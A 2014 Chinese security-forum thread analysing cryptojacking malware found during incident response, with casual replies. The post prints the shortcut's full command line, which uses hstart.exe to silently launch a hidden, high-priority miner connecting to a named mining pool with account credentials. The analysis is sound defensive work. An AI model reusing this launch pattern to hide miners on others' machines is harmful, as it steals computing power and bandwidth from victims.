查看: 2179|回复: 8
收起左侧

[讨论] 初探比特币Botnet

[复制链接]
yunsini
发表于 2014-10-31 14:53:19 | 显示全部楼层 |阅读模式
本帖最后由 yunsini 于 2014-10-31 14:53 编辑

前些天,同事去客户那里进行应急响应时带回了一些样本.同事说可能比较有趣,让我看看一下有没有什么好玩的.

样本有32和64位两种,这是64位的截图
1.jpg


里面有个叫“bash”的快捷方式。具体指向的内容是:

C:\Windows\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv64" /HIGH "%SystemRoot%\init\spoolv64\init.exe -o stratum+tcp://monk.us.to:3333 -O geox.2:x"

简单分析发现hstart.exe是个正常的程序,它主要的作用是让窗口程序无窗口启动。
可以在http://www.ntwind.com/software/hstart.html 下载到它.
网站上有它的启动参数截图:
2.jpg
看其调用参数可以知道hstart使用无×界面、高优先级来启动init.exe

使用IDA简单分析init.exe,已经其启动参数可以推测出,它是用挖掘比特币的.
因为看参数调用,它和一个叫做minerd的比特币挖掘的软件用法差不多.
http://doges.org/digging-coins/guide-on-mining-with-minerd-(cpu)/  有这个软件的介绍.

在现在的程序中:
monk.us.to       是挖矿服务器地址
3333  是端口
geox 是账号.
x 是密码.

取证带回的其他dll文件都是正常的库文件.
yunsini
 楼主| 发表于 2014-10-31 16:35:57 | 显示全部楼层
发错地方了?都没人看,没人回复啊??[:340:]
panzhitian
发表于 2014-10-31 16:47:19 来自手机 | 显示全部楼层
如果是盗取比特币的malware或者漏洞什么的,应该会火,各种扫描党,主防党,分析行为什么的。
yaoogle007
发表于 2014-10-31 16:49:37 | 显示全部楼层
已经看过了。。。。。。。。。。。。。。。。。。
yunsini
 楼主| 发表于 2014-10-31 16:50:41 | 显示全部楼层
本帖最后由 yunsini 于 2014-10-31 17:06 编辑

@panzhitian 恩,
这个是那别人机器挖掘比特币,阻塞了宽带、消耗机器性能....


说挖挖掘,那么问题来了。。
yunsini
 楼主| 发表于 2014-10-31 17:05:10 | 显示全部楼层
yaoogle007 发表于 2014-10-31 16:49
已经看过了。。。。。。。。。。。。。。。。。。

苦逼的AV工程屎?
liangxy
头像被屏蔽
发表于 2014-10-31 17:11:26 | 显示全部楼层
账号密码呢?我裤子都脱了
yunsini
 楼主| 发表于 2014-11-15 23:53:18 | 显示全部楼层
liangxy 发表于 2014-10-31 17:11
账号密码呢?我裤子都脱了

天冷了,还是穿上吧
天原
发表于 2014-11-18 20:55:55 | 显示全部楼层
拿别人的机器给自己赚钱 这也是醉了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-25 01:30 , Processed in 0.131239 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表